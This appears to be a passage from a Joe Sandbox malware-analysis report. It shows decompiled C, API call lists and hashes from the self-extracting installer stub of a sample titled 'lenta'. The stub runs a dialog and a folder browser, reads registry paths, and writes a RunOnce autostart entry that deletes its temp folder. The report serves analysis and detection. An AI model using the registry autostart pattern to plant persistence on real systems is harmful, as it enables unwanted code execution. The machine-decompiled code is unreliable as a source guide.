                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 011D2D34
                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 011D2D40
                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 011D2DAE
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 011D2DBD
                                                                      • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 011D2E0A
                                                                        • Part of subcall function 011D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                        • Part of subcall function 011D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                                                                      • API String ID: 1002816675-2993962200
                                                                      • Opcode ID: 763c5419a26a31c3793e5426fb41e8b584b93378b70135b5d779d6c8a9b3c450
                                                                      • Instruction ID: 919b222afe4421e85f969451abf0c506e1660a75f83e33b3caa798e0c1207a3f
                                                                      • Opcode Fuzzy Hash: 763c5419a26a31c3793e5426fb41e8b584b93378b70135b5d779d6c8a9b3c450
                                                                      • Instruction Fuzzy Hash: 36514B703423266BF73CA679DD4AB7B3698EB45708F044039EA71D65C8DBB888C1C722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E011D34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                      				void* _t9;
                                                                      				void* _t12;
                                                                      				void* _t13;
                                                                      				void* _t17;
                                                                      				void* _t23;
                                                                      				void* _t25;
                                                                      				struct HWND__* _t35;
                                                                      				struct HWND__* _t38;
                                                                      				void* _t39;
                                                                      
                                                                      				_t9 = _a8 - 0x10;
                                                                      				if(_t9 == 0) {
                                                                      					__eflags = 1;
                                                                      					L19:
                                                                      					_push(0);
                                                                      					 *0x11d91d8 = 1;
                                                                      					L20:
                                                                      					_push(_a4);
                                                                      					L21:
                                                                      					EndDialog();
                                                                      					L22:
                                                                      					return 1;
                                                                      				}
                                                                      				_push(1);
                                                                      				_pop(1);
                                                                      				_t12 = _t9 - 0xf2;
                                                                      				if(_t12 == 0) {
                                                                      					__eflags = _a12 - 0x1b;
                                                                      					if(_a12 != 0x1b) {
                                                                      						goto L22;
                                                                      					}
                                                                      					goto L19;
                                                                      				}
                                                                      				_t13 = _t12 - 0xe;
                                                                      				if(_t13 == 0) {
                                                                      					_t35 = _a4;
                                                                      					 *0x11d8584 = _t35;
                                                                      					E011D43D0(_t35, GetDesktopWindow());
                                                                      					__eflags =  *0x11d8184; // 0x1
                                                                      					if(__eflags != 0) {
                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                      					}
                                                                      					SetWindowTextA(_t35, "lenta");
                                                                      					_t17 = CreateThread(0, 0, E011D4FE0, 0, 0, 0x11d8798);
                                                                      					 *0x11d879c = _t17;
                                                                      					__eflags = _t17;
                                                                      					if(_t17 != 0) {
                                                                      						goto L22;
                                                                      					} else {
                                                                      						E011D44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                      						_push(0);
                                                                      						_push(_t35);
                                                                      						goto L21;
                                                                      					}
                                                                      				}
                                                                      				_t23 = _t13 - 1;
                                                                      				if(_t23 == 0) {
                                                                      					__eflags = _a12 - 2;
                                                                      					if(_a12 != 2) {
                                                                      						goto L22;
                                                                      					}
                                                                      					ResetEvent( *0x11d858c);
                                                                      					_t38 =  *0x11d8584; // 0x0
                                                                      					_t25 = E011D44B9(_t38, 0x4b2, 0x11d1140, 0, 0x20, 4);
                                                                      					__eflags = _t25 - 6;
                                                                      					if(_t25 == 6) {
                                                                      						L11:
                                                                      						 *0x11d91d8 = 1;
                                                                      						SetEvent( *0x11d858c);
                                                                      						_t39 =  *0x11d879c; // 0x0
                                                                      						E011D3680(_t39);
                                                                      						_push(0);
                                                                      						goto L20;
                                                                      					}
                                                                      					__eflags = _t25 - 1;
                                                                      					if(_t25 == 1) {
                                                                      						goto L11;
                                                                      					}
                                                                      					SetEvent( *0x11d858c);
                                                                      					goto L22;
                                                                      				}
                                                                      				if(_t23 == 0xe90) {
                                                                      					TerminateThread( *0x11d879c, 0);
                                                                      					EndDialog(_a4, _a12);
                                                                      					return 1;
                                                                      				}
                                                                      				return 0;
                                                                      			}













                                                                      APIs
                                                                      • TerminateThread.KERNEL32(00000000), ref: 011D3535
                                                                      • EndDialog.USER32(?,?), ref: 011D3541
                                                                      • ResetEvent.KERNEL32 ref: 011D355F
                                                                      • SetEvent.KERNEL32(011D1140,00000000,00000020,00000004), ref: 011D3590
                                                                      • GetDesktopWindow.USER32 ref: 011D35C7
                                                                      • GetDlgItem.USER32(?,0000083B), ref: 011D35F1
                                                                      • SendMessageA.USER32(00000000), ref: 011D35F8
                                                                      • GetDlgItem.USER32(?,0000083B), ref: 011D3610
                                                                      • SendMessageA.USER32(00000000), ref: 011D3617
                                                                      • SetWindowTextA.USER32(?,lenta), ref: 011D3623
                                                                      • CreateThread.KERNEL32 ref: 011D3637
                                                                      • EndDialog.USER32(?,00000000), ref: 011D3671
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                      • String ID: lenta
                                                                      • API String ID: 2406144884-2780258678
                                                                      • Opcode ID: be46e9d7f2010aae31fbc29aa6b9e025b5c7081866153d2f275fa69abc59e678
                                                                      • Instruction ID: 95fbddd2100d177d16b56088f4ed7f10f27dfab740def00808956f00f8458985
                                                                      • Opcode Fuzzy Hash: be46e9d7f2010aae31fbc29aa6b9e025b5c7081866153d2f275fa69abc59e678
                                                                      • Instruction Fuzzy Hash: E931C0B0253211BBDB3D5B39EC4CE2A3E69FB85B40F444539F63292698CB758580CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 50%
                                                                      			E011D4224(char __ecx) {
                                                                      				char* _v8;
                                                                      				_Unknown_base(*)()* _v12;
                                                                      				_Unknown_base(*)()* _v16;
                                                                      				_Unknown_base(*)()* _v20;
                                                                      				char* _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				char _v44;
                                                                      				char _v48;
                                                                      				char _v52;
                                                                      				_Unknown_base(*)()* _t26;
                                                                      				_Unknown_base(*)()* _t28;
                                                                      				_Unknown_base(*)()* _t29;
                                                                      				_Unknown_base(*)()* _t32;
                                                                      				char _t42;
                                                                      				char* _t44;
                                                                      				char* _t61;
                                                                      				void* _t63;
                                                                      				char* _t65;
                                                                      				struct HINSTANCE__* _t66;
                                                                      				char _t67;
                                                                      				void* _t71;
                                                                      				char _t76;
                                                                      				intOrPtr _t85;
                                                                      
                                                                      				_t67 = __ecx;
                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                      				if(_t66 == 0) {
                                                                      					_t63 = 0x4c2;
                                                                      					L22:
                                                                      					E011D44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                      					return 0;
                                                                      				}
                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                      				_v12 = _t26;
                                                                      				if(_t26 == 0) {
                                                                      					L20:
                                                                      					FreeLibrary(_t66);
                                                                      					_t63 = 0x4c1;
                                                                      					goto L22;
                                                                      				}
                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                      				_v20 = _t28;
                                                                      				if(_t28 == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                      				_v16 = _t29;
                                                                      				if(_t29 == 0) {
                                                                      					goto L20;
                                                                      				}
                                                                      				_t76 =  *0x11d88c0; // 0x0
                                                                      				if(_t76 != 0) {
                                                                      					L10:
                                                                      					 *0x11d87a0 = 0;
                                                                      					_v52 = _t67;
                                                                      					_v48 = 0;
                                                                      					_v44 = 0;
                                                                      					_v40 = 0x11d8598;
                                                                      					_v36 = 1;
                                                                      					_v32 = E011D4200;
                                                                      					_v28 = 0x11d88c0;
                                                                      					 *0x11da288( &_v52);
                                                                      					_t32 =  *_v12();
                                                                      					if(_t71 != _t71) {
                                                                      						asm("int 0x29");
                                                                      					}
                                                                      					_v12 = _t32;
                                                                      					if(_t32 != 0) {
                                                                      						 *0x11da288(_t32, 0x11d88c0);
                                                                      						 *_v16();
                                                                      						if(_t71 != _t71) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      						if( *0x11d88c0 != 0) {
                                                                      							E011D1680(0x11d87a0, 0x104, 0x11d88c0);
                                                                      						}
                                                                      						 *0x11da288(_v12);
                                                                      						 *_v20();
                                                                      						if(_t71 != _t71) {
                                                                      							asm("int 0x29");
                                                                      						}
                                                                      					}
                                                                      					FreeLibrary(_t66);
                                                                      					_t85 =  *0x11d87a0; // 0x0
                                                                      					return 0 | _t85 != 0x00000000;
                                                                      				} else {
                                                                      					GetTempPathA(0x104, 0x11d88c0);
                                                                      					_t61 = 0x11d88c0;
                                                                      					_t4 =  &(_t61[1]); // 0x11d88c1
                                                                      					_t65 = _t4;
                                                                      					do {
                                                                      						_t42 =  *_t61;
                                                                      						_t61 =  &(_t61[1]);
                                                                      					} while (_t42 != 0);
                                                                      					_t5 = _t61 - _t65 + 0x11d88c0; // 0x23b1181
                                                                      					_t44 = CharPrevA(0x11d88c0, _t5);
                                                                      					_v8 = _t44;
                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0x11d88c0, _t44)) != 0x3a) {
                                                                      						 *_v8 = 0;
                                                                      					}
                                                                      					goto L10;
                                                                      				}
                                                                      			}





























                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 011D4236
                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 011D424C
                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 011D4263
                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 011D427A
                                                                      • GetTempPathA.KERNEL32(00000104,011D88C0,?,00000001), ref: 011D429F
                                                                      • CharPrevA.USER32(011D88C0,023B1181,?,00000001), ref: 011D42C2
                                                                      • CharPrevA.USER32(011D88C0,00000000,?,00000001), ref: 011D42D6
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 011D4391
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 011D43A5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                      • API String ID: 1865808269-1731843650
                                                                      • Opcode ID: cf741efafa220a20f0bfd6ff849449ed6f48c3a4c82677cabff2775194c15b7b
                                                                      • Instruction ID: a4cc3069a3efe46106ba29fb51848a40e85b8db05d7a603b48b2b48096cf00a3
                                                                      • Opcode Fuzzy Hash: cf741efafa220a20f0bfd6ff849449ed6f48c3a4c82677cabff2775194c15b7b
                                                                      • Instruction Fuzzy Hash: 23412874A02254BFE72DAF79F885A6E7FB4EF45344F044179EA51A3A45CB348841C760
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                      				signed int _v8;
                                                                      				char _v64;
                                                                      				char _v576;
                                                                      				void* _v580;
                                                                      				struct HWND__* _v584;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t34;
                                                                      				void* _t37;
                                                                      				signed int _t39;
                                                                      				intOrPtr _t43;
                                                                      				signed int _t44;
                                                                      				signed int _t49;
                                                                      				signed int _t52;
                                                                      				void* _t54;
                                                                      				intOrPtr _t55;
                                                                      				intOrPtr _t58;
                                                                      				intOrPtr _t59;
                                                                      				int _t64;
                                                                      				void* _t66;
                                                                      				intOrPtr* _t67;
                                                                      				signed int _t69;
                                                                      				intOrPtr* _t73;
                                                                      				intOrPtr* _t76;
                                                                      				intOrPtr* _t77;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				void* _t82;
                                                                      				intOrPtr* _t84;
                                                                      				void* _t85;
                                                                      				signed int _t89;
                                                                      
                                                                      				_t75 = __edx;
                                                                      				_t34 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t34 ^ _t89;
                                                                      				_v584 = __ecx;
                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                      				_t67 = _a4;
                                                                      				_t69 = 0xd;
                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                      				_v580 = _t37;
                                                                      				asm("movsb");
                                                                      				if(( *0x11d8a38 & 0x00000001) != 0) {
                                                                      					_t39 = 1;
                                                                      				} else {
                                                                      					_v576 = 0;
                                                                      					LoadStringA( *0x11d9a3c, _t75,  &_v576, 0x200);
                                                                      					if(_v576 != 0) {
                                                                      						_t73 =  &_v576;
                                                                      						_t16 = _t73 + 1; // 0x1
                                                                      						_t75 = _t16;
                                                                      						do {
                                                                      							_t43 =  *_t73;
                                                                      							_t73 = _t73 + 1;
                                                                      						} while (_t43 != 0);
                                                                      						_t84 = _v580;
                                                                      						_t74 = _t73 - _t75;
                                                                      						if(_t84 == 0) {
                                                                      							if(_t67 == 0) {
                                                                      								_t27 = _t74 + 1; // 0x2
                                                                      								_t83 = _t27;
                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                      								_t80 = _t44;
                                                                      								if(_t80 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									_t75 = _t83;
                                                                      									_t74 = _t80;
                                                                      									E011D1680(_t80, _t83,  &_v576);
                                                                      									goto L23;
                                                                      								}
                                                                      							} else {
                                                                      								_t76 = _t67;
                                                                      								_t24 = _t76 + 1; // 0x1
                                                                      								_t85 = _t24;
                                                                      								do {
                                                                      									_t55 =  *_t76;
                                                                      									_t76 = _t76 + 1;
                                                                      								} while (_t55 != 0);
                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                      								_t83 = _t25 + _t74;
                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                      								_t80 = _t44;
                                                                      								if(_t80 == 0) {
                                                                      									goto L6;
                                                                      								} else {
                                                                      									E011D171E(_t80, _t83,  &_v576, _t67);
                                                                      									goto L23;
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							_t77 = _t67;
                                                                      							_t18 = _t77 + 1; // 0x1
                                                                      							_t81 = _t18;
                                                                      							do {
                                                                      								_t58 =  *_t77;
                                                                      								_t77 = _t77 + 1;
                                                                      							} while (_t58 != 0);
                                                                      							_t75 = _t77 - _t81;
                                                                      							_t82 = _t84 + 1;
                                                                      							do {
                                                                      								_t59 =  *_t84;
                                                                      								_t84 = _t84 + 1;
                                                                      							} while (_t59 != 0);
                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                      							_t80 = _t44;
                                                                      							if(_t80 == 0) {
                                                                      								goto L6;
                                                                      							} else {
                                                                      								_push(_v580);
                                                                      								E011D171E(_t80, _t83,  &_v576, _t67);
                                                                      								L23:
                                                                      								MessageBeep(_a12);
                                                                      								if(E011D681F(_t67) == 0) {
                                                                      									L25:
                                                                      									_t49 = 0x10000;
                                                                      								} else {
                                                                      									_t54 = E011D67C9(_t74, _t74);
                                                                      									_t49 = 0x190000;
                                                                      									if(_t54 == 0) {
                                                                      										goto L25;
                                                                      									}
                                                                      								}
                                                                      								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16);
                                                                      								_t83 = _t52;
                                                                      								LocalFree(_t80);
                                                                      								_t39 = _t52;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						if(E011D681F(_t67) == 0) {
                                                                      							L4:
                                                                      							_t64 = 0x10010;
                                                                      						} else {
                                                                      							_t66 = E011D67C9(0, 0);
                                                                      							_t64 = 0x190010;
                                                                      							if(_t66 == 0) {
                                                                      								goto L4;
                                                                      							}
                                                                      						}
                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                      						L6:
                                                                      						_t39 = _t44 | 0xffffffff;
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                      			}




































                                                                      APIs
                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 011D4518
                                                                      • MessageBoxA.USER32(?,?,lenta,00010010), ref: 011D4554
                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 011D45A3
                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 011D45E3
                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 011D460D
                                                                      • MessageBeep.USER32(00000000), ref: 011D4630
                                                                      • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 011D4666
                                                                      • LocalFree.KERNEL32(00000000), ref: 011D466F
                                                                        • Part of subcall function 011D681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 011D686E
                                                                        • Part of subcall function 011D681F: GetSystemMetrics.USER32(0000004A), ref: 011D68A7
                                                                        • Part of subcall function 011D681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 011D68CC
                                                                        • Part of subcall function 011D681F: RegQueryValueExA.ADVAPI32(?,011D1140,00000000,?,?,0000000C), ref: 011D68F4
                                                                        • Part of subcall function 011D681F: RegCloseKey.ADVAPI32(?), ref: 011D6902
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                      • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                      • API String ID: 3244514340-1000497449
                                                                      • Opcode ID: 769a05f93468d6101d132e22bcd289ccbe98b1bffdc94a09a93803cbcd52d892
                                                                      • Instruction ID: ebe786f9558e36264c5eb604c62ea120a78867c1f252437657de4875ddbcca23
                                                                      • Opcode Fuzzy Hash: 769a05f93468d6101d132e22bcd289ccbe98b1bffdc94a09a93803cbcd52d892
                                                                      • Instruction Fuzzy Hash: 8F51577290121AAFDF29DF28DC48BAA7B79EF44304F0401A4ED19A3A45DB31DE45CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E011D2773(CHAR* __ecx, char* _a4) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v269;
                                                                      				CHAR* _v276;
                                                                      				int _v280;
                                                                      				void* _v284;
                                                                      				int _v288;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t23;
                                                                      				intOrPtr _t34;
                                                                      				int _t45;
                                                                      				int* _t50;
                                                                      				CHAR* _t52;
                                                                      				CHAR* _t61;
                                                                      				char* _t62;
                                                                      				int _t63;
                                                                      				CHAR* _t64;
                                                                      				signed int _t65;
                                                                      
                                                                      				_t52 = __ecx;
                                                                      				_t23 =  *0x11d8004; // 0xdc3102d5
                                                                      				_v8 = _t23 ^ _t65;
                                                                      				_t62 = _a4;
                                                                      				_t50 = 0;
                                                                      				_t61 = __ecx;
                                                                      				_v276 = _t62;
                                                                      				 *((char*)(__ecx)) = 0;
                                                                      				if( *_t62 != 0x23) {
                                                                      					_t63 = 0x104;
                                                                      					goto L14;
                                                                      				} else {
                                                                      					_t64 = _t62 + 1;
                                                                      					_v269 = CharUpperA( *_t64);
                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                      					_t63 = 0x104;
                                                                      					_t34 = _v269;
                                                                      					if(_t34 == 0x53) {
                                                                      						L14:
                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                      						goto L15;
                                                                      					} else {
                                                                      						if(_t34 == 0x57) {
                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                      							goto L16;
                                                                      						} else {
                                                                      							_push(_t52);
                                                                      							_v288 = 0x104;
                                                                      							E011D1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                      							_t59 = 0x104;
                                                                      							E011D658A( &_v268, 0x104, _v276);
                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                      								L16:
                                                                      								_t59 = _t63;
                                                                      								E011D658A(_t61, _t63, _v276);
                                                                      							} else {
                                                                      								if(RegQueryValueExA(_v284, 0x11d1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                      									_t45 = _v280;
                                                                      									if(_t45 != 2) {
                                                                      										L9:
                                                                      										if(_t45 == 1) {
                                                                      											goto L10;
                                                                      										}
                                                                      									} else {
                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                      											_t45 = _v280;
                                                                      											goto L9;
                                                                      										} else {
                                                                      											_t59 = 0x104;
                                                                      											E011D1680(_t61, 0x104,  &_v268);
                                                                      											L10:
                                                                      											_t50 = 1;
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								RegCloseKey(_v284);
                                                                      								L15:
                                                                      								if(_t50 == 0) {
                                                                      									goto L16;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				return E011D6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                      			}
























                                                                      APIs
                                                                      • CharUpperA.USER32(DC3102D5,00000000,00000000,00000000), ref: 011D27A8
                                                                      • CharNextA.USER32(0000054D), ref: 011D27B5
                                                                      • CharNextA.USER32(00000000), ref: 011D27BC
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2829
                                                                      • RegQueryValueExA.ADVAPI32(?,011D1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2852
                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D2870
                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 011D28A0
                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 011D28AA
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 011D28B9
                                                                      Strings
                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 011D27E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.403676389.00000000011D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.403646115.00000000011D0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403686161.00000000011D8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.403693552.00000000011DC000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_11d0000_file.jbxd
                                                                      Similarity
                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                      • API String ID: 2659952014-2428544900
                                                                      • Opcode ID: d06ba28897f31b702abf63b4f0b44e084a5439aaf21c1c0f7ecbcca707013a7a
                                                                      • Instruction ID: 5d1b86cc408e30afe6daead0e088d2313e2b2a051f0ff1836d0f2449710481ff
                                                                      • Opcode Fuzzy Hash: d06ba28897f31b702abf63b4f0b44e084a5439aaf21c1c0f7ecbcca707013a7a
                                                                      • Instruction Fuzzy Hash: 94419371E01128AFDB2D9B64DC85AEABBBDEF55700F0040A9F659D3105DB748EC58FA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 62%
                                                                      			E011D2267() {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v836;
                                                                      				void* _v840;
                                                                      				int _v844;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t19;
                                                                      				intOrPtr _t33;
                                                                      				void* _t38;
                                                                      				intOrPtr* _t42;
                                                                      				void* _t45;
                                                                      				void* _t47;
                                                                      				void* _t49;
                                                                      				signed int _t51;
                                                                      
                                                                      				_t19 =  *0x11d8004; // 0xdc3102d5
                                                                      				_t20 = _t19 ^ _t51;
                                                                      				_v8 = _t19 ^ _t51;
                                                                      				if( *0x11d8530 != 0) {
                                                                      					_push(_t49);
                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                      						_push(_t38);
                                                                      						_v844 = 0x238;
                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                      							_push(_t47);
                                                                      							memset( &_v268, 0, 0x104);
                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                      								E011D658A( &_v268, 0x104, 0x11d1140);
                                                                      							}
                                                                      							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                      							E011D171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                      							_t42 =  &_v836;
                                                                      							_t45 = _t42 + 1;
                                                                      							_pop(_t47);
                                                                      							do {
                                                                      								_t33 =  *_t42;
                                                                      								_t42 = _t42 + 1;
                                                                      							} while (_t33 != 0);
                                                                      							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                      						}
                                                                      						_t20 = RegCloseKey(_v840);
                                                                      						_pop(_t38);
                                                                      					}
                                                                      					_pop(_t49);
                                                                      				}
                                                                      				return E011D6CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                      			}




















                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 011D22A3
